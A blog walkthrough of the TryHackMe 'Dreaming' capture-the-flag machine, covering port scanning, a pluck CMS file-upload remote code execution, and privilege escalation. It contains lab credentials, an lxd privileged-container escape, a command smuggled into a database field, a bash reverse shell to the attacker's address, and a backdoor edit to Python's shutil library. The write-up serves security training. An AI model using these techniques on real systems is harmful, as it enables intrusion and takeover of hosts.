Blog - h00dy

Dreaming TryHackMe Walkthrough | Easy + Unintended

Dreaming TryHackMe Walkthrough | Easy + Unintended

Kunal Jaglan's photo
Kunal Jaglan
·

2 min read

Table of contents

Nmap -

> nmap -sVC -T4 10.10.251.54 -oN scans/nmap_initial

# Nmap 7.94 scan initiated Sat Nov 18 14:29:16 2023 as: nmap -v -sC -T4 -sV -oN scans/nmap_initial 10.10.251.54
Nmap scan report for 10.10.251.54
Host is up (0.17s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 76:26:67:a6:b0:08:0e:ed:34:58:5b:4e:77:45:92:57 (RSA)
|   256 52:3a:ad:26:7f:6e:3f:23:f9:e4:ef:e8:5a:c8:42:5c (ECDSA)
|_  256 71:df:6e:81:f0:80:79:71:a8:da:2e:1e:56:c4:de:bb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 18 14:30:06 2023 -- 1 IP address (1 host up) scanned in 50.69 seconds

Gobuster ( Dir Fuzz Output) -

> gobuster dir -u http://10.10.251.54 -w /usr/share/dirb/wordlists/common.txt -t 20 -o gobust.log

/app                 (Status: 301) [Size: 310] [--> http://10.10.251.54/app/]

pluck 4.7.13 -> shell.phar file upload rce

http://10.10.250.141/app/pluck-4.7.13/login.php
admin:password
http://10.10.250.141/app/pluck-4.7.13/files/shell.phar

www-data -> lucien

cd /opt
cat test.py
lucien:HeyLucien#@1999!

group lxd - unintended

on your machine

git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686
python3 -m http.server 80
  • Start a python server, transfer the alpine image to the box
cd /dev/shm; wget <tun0-ip>/alpine-v3.8-i686-20231118_1500.tar.gz
lxd init
lxc image import ./alpine*.tar.gz --alias voldemort
lxc init voldemort hogwarts -c security.privileged=true
lxc config device add hogwarts hogwarts disk source=/home/ path=/mnt/home recursive=true
lxc start hogwarts
lxc exec hogwarts /bin/sh
cd /mnt/home

Intended - history reveals lucien mysql creds

mysql -u lucien -u lucien42DBPASSWORD
use information_schema;
select * from USER_PRIVILEGES;
  • lucien got insert / update permission in db
mysql> use library;
mysql> select * from dreams;
+---------+------------------------------------+
| dreamer | dream                              |
+---------+------------------------------------+
| Alice   | Flying in the sky                  |
| Bob     | Exploring ancient ruins            |
| Carol   | Becoming a successful entrepreneur |
| Dave    | Becoming a professional musician   |
+---------+------------------------------------+
4 rows in set (0.00 sec)

mysql> Insert into dreams (dreamer,dream) Values ('vold;/tmp/voldemort','n00b');
mysql> exit
```

```
cat << EOF > /tmp/voldemort
#!/bin/bash
/bin/bash -c '/bin/bash -i >& /dev/tcp/<tun0-ip>/1337 0>&1'
EOF
sudo -u death python3 /home/death/getDreams.py

edit /usr/lib/python3.8/shutil.py cuz death user got write perms

  • in copy2() function add:
os.system("chmod +rwx /home/morpheus/morpheus_flag.txt");

Thanks for reading<3

tryhackmeredteamingCTFhacking